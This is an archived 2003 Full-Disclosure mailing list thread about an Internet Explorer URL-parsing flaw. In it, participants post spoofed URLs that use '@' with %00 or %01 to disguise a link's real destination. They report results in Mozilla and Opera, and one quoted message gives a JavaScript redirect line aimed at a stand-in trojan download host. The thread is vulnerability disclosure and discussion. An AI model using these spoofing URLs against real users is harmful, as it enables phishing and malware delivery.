lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <1071068780.2357.2.camel@rh9lt.intern.adiscon.com>
From: rgerhards at hq.adiscon.com (Rainer Gerhards)
Subject: RE: FWD: Internet Explorer URL parsing
	vulnerability

Just to add

http://www.microsoft.com:security%00@....linux.org/

works equally well with Mozilla/5.0 (X11; U; Linux i686; en-US;
rv:1.2.1) Gecko/20030225 under Red Hat Linux 9. So it is not just an IE
issue...

Opera at least displays a decent warning and also replaces the password
part of the credentials in visible display.

Rainer

On Wed, 2003-12-10 at 13:53, Rainer Gerhards wrote:
> Well, 0x00 works even better (as usual). Consider the following URL:
> 
> http://www.microsoft.com:security%00@...w%77%2elinu%78%2eorg
> 
> This, together with a little social engineering can do much. In my IE
> 6.0.2800.1106.xpsp2.03422-1633 this takes your to www.linux.org, which
> is also shown in the address bar. The status bar will show
> "www.microsoft.com:security" whenever you hover over relative links on
> the site (check with the news). The trick will most probably work will
> with fake sites that remove the address bar.
> 
> The 0x00 C string terminator causes often quite some troubles. I
> remember reporting a similar problem to Microsoft some month ago, then
> related to %00 not being correctly parsed by IIS. It was considered
> low
> risk by Microsoft and not immediately addressed (I have to admit I
> actually think this at least not very high risk...). It should be
> addressed by now.
> 
> Back to the dicsussed topic: I think it is also not very clever to
> display credentials in the status bar. So if somebody is dumb enough
> to
> actually use URLs with credentials, I think the browser should remove
> them in all visible elements.
> 
> Rainer Gerhards
> Adiscon
> 
> 
> 
> 
> 
> 
> ________________________________
> 
>         From: VeNoMouS [mailto:venom@...-x.co.nz] 
>         Sent: Wednesday, December 10, 2003 6:03 AM
>         To: Julian HO Thean Swee; full-disclosure@...ts.netsys.com
>         Subject: Re: [Full-Disclosure] RE: FWD: Internet Explorer URL
> parsing vulnerability
>         
>         
>         umm tested this you dont need %01 either btw.
>         
>         www.microsoft.com@....linux.org
>         
>         was messing around with some hex stile as well is there a way
> to
> call a file:// inside a http:// becos the issue with doing the @ trick
> is it appends http:// automaticly, mind you , u could just make it
> exec
> some vb code or something on a site, just a random idea any way
>         
>         and it dont also seem to work if you use hex as well for the
> full domain ie
>         
>         www.microsoft.com%40%77%77%77%2E%6C%69%6E%75%78%2E%6F%72%67
>         
>                 nor  www.microsoft.com%40www.linux.org
>         
>                 where as if you
> www.microsoft.com@...%77%77%2E%6C%69%6E%75%78%2E%6F%72%67 works
>         
>         
>         
>         
>         
>         
>         ----- Original Message ----- 
> 
>                 From: Julian HO Thean Swee <mailto:jho@...rhub.com>  
>                 To: 'full-disclosure@...ts.netsys.com' 
>                 Sent: Wednesday, December 10, 2003 4:22 PM
>                 Subject: [Full-Disclosure] RE: FWD: Internet Explorer
> URL parsing vulnerability
> 
> 
>                 Hmm, it doesn't seem to work on my browser :) 
>                 I don't even get transported to any page when i click
> the button. 
>                 But then again, i have everything turned off in the
> internet zone by default... 
>                 (but my submit non-encrypted form data is on) 
> 
>                 Does it really work then?  it looks like it's using
> javascript...? (location.href) 
>                 Merry Christmas everyone :) 
> 
>                         --__--__-- 
> 
>                         Message: 1 
>                         Date: Tue, 9 Dec 2003 10:22:59 -0800 (PST) 
>                         From: S G Masood <sgmasood@...oo.com> 
>                         To: full-disclosure@...ts.netsys.com 
>                         Subject: [Full-Disclosure] RE: FWD: Internet
> Explorer URL parsing vulnerability 
> 
> 
>                         LOL. This is so simple and dangerous, it
> almost
> made 
>                         me laugh and cry at the same time. Most of you
> will 
>                         realise why...;D 
>                         The Paypal, AOL, Visa, Mastercard, et al email
>                         scammers will have a harvest of gold this
> month
> with 
>                         lots of zombies falling for this simple
> technique. 
> 
>                         ># POC ########## 
>         
> >http://www.zapthedingbat.com/security/ex01/vun1.htm
> 
>                         Dont be surprised if your latest download from
>                         http://www.microsoft.com turns out to be a
> trojan! 
> 
>         
> location.href=unescape('http://windowsupdate.microsoft.com%01@...edownlo
> adaneviltrojanfromme.com); 
> 
> 
>                         -- 
>                         S.G.Masood 
> 
>                         Hyderabad, 
>                         India 
> 
>                         PS: One more thing - no scripting required to
> exploit this. 
> 
>                         __________________________________ 
>                         Do you Yahoo!? 
>                         Free Pop-Up Blocker - Get it now 
>                         http://companion.yahoo.com/
> 
> 
>                 This email is confidential and privileged.  If you are
> not the intended recipient, you must not view, disseminate, use or
> copy
> this email. Kindly notify the sender immediately, and delete this
> email
> from your system. Thank you.
> 
>                 Please visit our website at www.starhub.com 
> 
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ